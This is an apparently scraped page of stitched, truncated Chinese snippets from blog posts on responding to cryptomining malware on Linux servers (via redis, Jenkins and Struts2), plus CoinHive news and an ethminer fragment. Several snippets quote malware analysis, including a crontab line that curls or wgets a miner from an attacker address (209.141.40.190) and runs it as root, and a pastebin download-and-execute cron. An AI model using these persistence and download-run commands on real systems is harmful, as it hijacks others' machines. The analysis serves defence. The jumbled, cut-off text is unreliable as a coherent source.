查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄 在/proc/PID/fd里面顺利找到执行脚本...grep -v grep | awk ‘{if(3>=80.0) print nohup /tmp/javax/sshd2 &>>/dev/null & else : fi sleep 60 done 从脚本的删除动作来看...,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现 修复方案 时间短,修复不是我来操作的。...初步并没有发现隐藏的激活方式,所以按照上面脚本的内容反向处理一下应该就可以了,注意防范redis的漏洞。
背景 日常应急响应过程中发现的挖矿脚本,对其进行分析发现写的质量该不错,可以学习下 样本分析及学习 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin...209.141.40.190" fi #写入计划任务: 使用-e参数:激活转义字符 #前三个是吸入系统计划任务 #第四个是写入个人计划任务 #写入计划任务的内容就是以curl、wget、python的urllib2库 来下载挖矿样本到.../tmp/xms,并以bash来执行下载的挖矿样本。...之后再删除下载的挖矿样本/tmp/xms echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c...xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root #放入etc/cron.hourly的脚本会每小时执行一次
ps -eopcpu,args –sort=%cpu|head 找到飙高的程序是minerd
一.简介 本脚本为公司服务器被挖矿,找到的下载矿机的脚本。但看到这么多行,应该是不止是挖矿,还做了别的事情。分析和学习此类脚本,可以防范和解决部分挖矿问题。 二.脚本内容 #!
事因:阿里突然发短信说我的阿里云服务器上面有挖矿程序!!!!!,顿时一惊,所以登陆到服务器。...1.我用了top命令查看系统目前系统性能 结果发现有个叫-bash的进程占用了99%的资源 2.接下来我用kill -9 21252 然后等一会又发现了这个脚本继续在占用资源,然后百度了下说这个挖矿可能有定时任务.../-bash或者vim — -bash 5.vim — -bash 挖矿里面全是乱码 回头看到 于是 vim run 最后删除udevd文件和run 问题解决 发布者:全栈程序员栈长,转载请注明出处
Linux watchdogs 感染性隐藏挖矿病毒。 网上都在讲watchBog,有什么用,能做什么事,没有特别好的方法去应对变种的挖矿病毒。...我从定时器的地址里面,找出了 python base64 转码的脚本 。解码后,发现了在 shell 脚本中有他们留下的联系方式。...crontab 如下 : 该crontab任务实现从 hxxps://pastebin.com/raw/sByq0rym 下载shell脚本并执行,shell脚本内容为: 使用base64进行转码后..., 可以看到下载执行的脚本文件内容。...经过几天测试,确认了我方感染源为 jenkins ,关闭服务,服务器挖矿病毒终于彻底解除 也有可能会是其他的服务,需要自行确认。
我相信有很多家伙会从这个新闻以及CoffeeMiner工具中得到启发,利用类似的攻击方式开创挖矿事业。...CoinHive 星巴克挖矿事件中所使用的便是CoinHive挖矿程序。Coinhive是一个提供门罗币挖掘JS脚本的网站平台,攻击者会将其提供的脚本植入到自己或入侵的网站上。...比如注册登陆时候的人机验证,就会启动挖矿程序,等待一段时间的挖矿后才能登录。 根据JavaScript Miner的介绍文档,将事例代码放入网站的html中就可以了,部署极其简单。...如此当移动设备连接到该热点,会自动弹窗提示需要认证,点击后就会访问含有挖矿代码的网页了。 考虑到大部分读者并不像我这样富有,同时拥有两块无线网卡!...此时我们便能得出结论,该热点存在着CoinHive挖矿代码。从wlan.sa字段取得该热点MAC地址,再结合Beacon或Probe帧获取其热点名称。
# 通过 cat /etc/crontab 查看到挖矿脚本 #!
本文转载自不正经程序员 温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。 挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。...用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。 有钱的地方,就有技术。但反过来并不一定成立。 牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。 1....我们只看挖矿脚本是怎么部署到你的机器上的。 在java中,当然要调用它的Runtime类库,如果你的应用程序是运行在root用户的,那它什么事情都能干。...真正的脚本是什么? $RANDOM环境变量,是个神奇的环境变量。直接输出的话,将会得到一个随机值。cron脚本周期性的拉取最新的脚本执行,把真正的挖矿程序部署起来。...xr程序才是挖矿的主要程序,其他的脚本,都是辅助它来运行的。下面是最主要的运行逻辑。 if [ !
根据赛门铁克今日发布的一份报告,公共网站被黑客挂上挖矿脚本的情况有变得更加严重的趋势。 一旦运行,这些脚本会导致访客机器的 CPU 资源被长时间大量占用。而与传统恶意软件相比,加密货币显然更有赚头。...据此,赛门铁克得以描绘出一张有关恶意挖矿脚本的“全球攻势图”。 据赛门铁克所述,最近几周,挖矿程序有着愈演愈烈的趋势。...这些脚本大多与门罗币(Menero)相关 —— 因其算法对 CPU“更加友好”一些 —— 而不是比特币(Bitcoin)或以太坊(Ethereum)。...而最受黑客青睐的后台挖矿脚本,就是今年 9 月份冒头的 Coinhive 。 虽然许多安全企业 迅速将它压了下去 ,但 Coinhive 的官网并未消失,而是换了个“选择加入”的门头。...赛门铁克已经发现了许多带有挖矿脚本的 Android App —— 尽管受 CPU 性能所限,移动设备挖矿的效率并不高。
温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。 挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。...我们只看挖矿脚本是怎么部署到你的机器上的。 在java中,当然要调用它的Runtime类库,如果你的应用程序是运行在root用户的,那它什么事情都能干。...真正的脚本是什么? $RANDOM环境变量,是个神奇的环境变量。直接输出的话,将会得到一个随机值。cron脚本周期性的拉取最新的脚本执行,把真正的挖矿程序部署起来。...《实力解剖一枚挖矿脚本,风骚操作亮瞎双眼》 这个脚本显然比上面这篇文章介绍的要更加高级一些。脚本很长很长,就不贴了,你可以自己下载。...xr程序才是挖矿的主要程序,其他的脚本,都是辅助它来运行的。下面是最主要的运行逻辑。 if [ !
geth –port 33333 –rpc –rpcapi eth –rpcaddr 192.168.10.176 –rpcport 8888 console 2 启动ethminer(挖矿软件...127.0.0.1:1234 –opencl-device 0 –opencl-platform 1 注意:只需要执行以上两步操作,不要添加其他参数或者启动后执行miner.start()操作 -G:启动GPU挖矿...(通过opencl调用GPU挖矿) -P:geth地址 –opencl-device x :x代表启动的Gpu数量,默认全部启动 注意:启动GPU挖矿需要geth节点设置为挖矿节点才可以启动挖矿,并且geth...的disk IO速度应该足够快,否则数据同步速度不能跟上主网区块产生速度,也无法挖矿.
直到统一的监控脚本接管了这几台机器,异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程,发现是一个挖矿脚本。下载下来学习了一下,发现脚本的编写者,有着较高的水平。...虽然在别人机器进行挖矿行为是不道德的,但掩盖不了脚本编写者的风骚操作。 挖矿,是计算机技术界最让人迷惑的行为之一,但它赚钱。据悉,这段脚本名叫DDG,已经挖取了价值一千多万人民币的虚拟币货币。...这个方法首先使用ps、grep、kill一套组合,干掉了同行的挖矿脚本,然后停掉了同行的cron脚本,黑吃黑的感觉。 在这段脚本里,使用了pkill命令。...这就有点狠了:影响我挖矿的进程,都得死! 相煎何太急。 code 9 再接下来,脚本针对不同的用户属性,进行了不同的操作。 首先是root用户。...可以看到,且不说真正的挖矿程序,仅仅是这个小脚本,作者也下足了功夫。脚本里命令繁多,使用方式多样,缩紧格式优雅,除了有一点啰嗦,没有加密之外,是一个非常好的拿来学习的脚本。
序 这是第二次遇到该挖矿病毒,网上也有很多大佬对该病毒做过分析,也想过再写可能没有什么意义,最终还是想写一写属于自己的东西,也算是两次相遇的总结。 背景 这次废话不多说,直接上,背景感觉毫无意义。...update.sh脚本分析 通过对程序进行分析,发现该病毒程序同路径下存在update.sh文件(/etc/update.sh),通过对该文件进行分析,发现该文件为挖矿病毒执行的脚本文件,因此对该脚本文件进行分析...-eq 0 ] then wge --timeout=10 --tries=100 -O $2 $3 fi fi 判断是否运行相同程序的挖矿病毒,如果有则删除 ps axf -o "pid"|while...,通过对脚本进行分析,可以发现该挖矿病毒主要依赖进程和启动项信息,借此可以对该病毒进行清理。...由于在日常生活中,使用桌面操作较多,因此对命令行使用不熟悉,找不到相关文件,因此对linux系统挖矿病毒清理较为恐惧,希望通过对脚本分析这种方式对刚入门的小伙伴有所帮助。
1.2 redis主机被植入挖矿脚本 经过文件排查,以下四台主机被人植入挖矿脚本。...4.2 从近期更改文件分析 查看最近一个月的文件更改情况并查看文件内容找到以下几个恶意文件(挖矿脚本) ?...4.2.2 分析tmp文件夹(存在后门文件) 查看/tmp文件夹,存在大量后门文件 挖矿脚本等恶意脚本存放在/tmp目录下 ? 分析root文件: ?...该文件设置定时任务,下载挖矿脚本至tmp文件夹 ?...6 回溯攻击源头 6.1 挖矿脚本提供站点 访问http://218.38.3.16:9999/,这是攻击者一个提供恶意脚本下载的网站 ? 查看该IP地址来源于韩国 ?
0 继续篇章 在上一篇【应急响应】redis未授权访问致远程植入挖矿脚本(防御篇)中,从防御的角度详细描述了应急响应以及流程。
挖矿样本-Win&Linux-危害&定性 危害:CPU拉满,网络阻塞,服务器卡顿、耗电等 定性:威胁情报平台上传解析分析,文件配置查看等 挖矿脚本会根据宿主机器电脑配置进行"合理挖矿"...上传分析挖矿脚本 Linux-Web安全漏洞导致挖矿事件 某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题...排查:挖矿程序-植入定时任务 排查:Web程序-JAVA_Struts2漏洞 放到微步在线分析 域名反查IP 一般挖矿脚本会配合启动项、计时任务等权限维持技术 1、写入计时任务...2、写入SSH公钥(私钥连接) 3、删除市场上已知挖矿脚本(恶意竞争了,属于是) Windows-系统口令爆破导致挖矿事件 某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸...,服务器疑似被挖矿。
由于Redis后门漏洞导致服务器被注入挖矿脚本解决过程 事件描述 某一天的早晨,我还是像往常一样搭着公交车开启打工仔的一天,一早8.30就到办公室了,坐着玩手机等上班,就这这时突然我组长飞快的回来办公室...,回来就说快看看阿里云后台服务,服务是不是挂掉了,我当时就纳闷了一大早的流量不大怎么就宕机了呢,不一会我组长收到了阿里云短信通知监测到恶意脚本,接下来就是脚本的查找 前期处理 首先是通过阿里云的控制台发现...再次发送以上的问题后,我开始对问题进行排除,我回想刚刚我明明把进程kill了,怎么还出现这个问题,难道是定时任务我使用crontab -l查看了当前liunx中的定时任务,突然发现一个奇怪30秒执行一次的脚本任务.../bin/进入到bin目录找到chattr指令果然,权限都被去除了,我们给它加上可执行权限即可 最后回到定时任务页面尝试将来root文件的属性去除,去除成功并且成功的清空了定时任务 清除脚本文件...,成功rm了这个脚本文件 总结 最后经过百度发现newinit.sh是一种挖矿脚本,是通过6379端口接入走后门被注入进来的,说到6379大家肯定很熟悉,没错这个就是Redis的默认端口,庆幸的是还好这个木马不是很深入
1 前面两篇尚未完结续,本篇继续 在上上篇【应急响应】redis未授权访问致远程植入挖矿脚本(防御篇)中,从防御的角度详细描述了常规应急响应以及流程。...在上一篇【应急响应】redis未授权访问致远程植入挖矿脚本(攻击篇)中,从日志等入侵痕迹中分析,寻求突破,以一个攻击者的角度还原redis攻击,从未授权访问到写入ssh公钥直至控制整台服务器,进一步确定此次勒索事件的根本原因...2 牵一发而动全身,纵向深入业务 经过综合的分析与评估,就几台开发环境中的redis服务器被植入挖矿脚本,再也没有找到其他被入侵的痕迹。...相关人员也及时处理了恶意脚本、按照安全配置规范对redis进行了加固。 就应急响应工作而言,可能该做的已经做好了,足以应对并向领导交差。...3.2 实践方向 为了有效利用此次“redis未授权访问致远程植入挖矿脚本”安全事件,可以组织相关开发、运维等人员参加事件的全程剖析与分享,让大家知道安全的重要性以及忽略安全的危害性。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
